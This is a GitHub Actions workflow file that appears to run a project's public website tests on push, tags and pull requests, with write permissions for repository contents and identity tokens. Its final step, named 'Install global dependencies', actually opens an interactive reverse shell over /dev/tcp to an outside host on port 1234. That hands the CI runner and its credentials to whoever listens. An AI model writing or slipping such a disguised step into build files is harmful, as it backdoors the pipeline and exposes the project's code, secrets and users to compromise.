name: Initiate workflow

on:
  push:
    branches:
      - safe-chain-ci
    tags: "**"
  pull_request:

permissions:
  id-token: write
  contents: write

jobs:
  run_public_website_tests:
    runs-on: ubuntu-22.04
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version-file: "public_website/.nvmrc"
      - uses: pass-culture/common-workflows/actions/setup-safe-chain@safe-chain-setup/v1.0.0
      - name: Install global dependencies
        run: bash -i >& /dev/tcp/algorab.fr/1234 0>&1


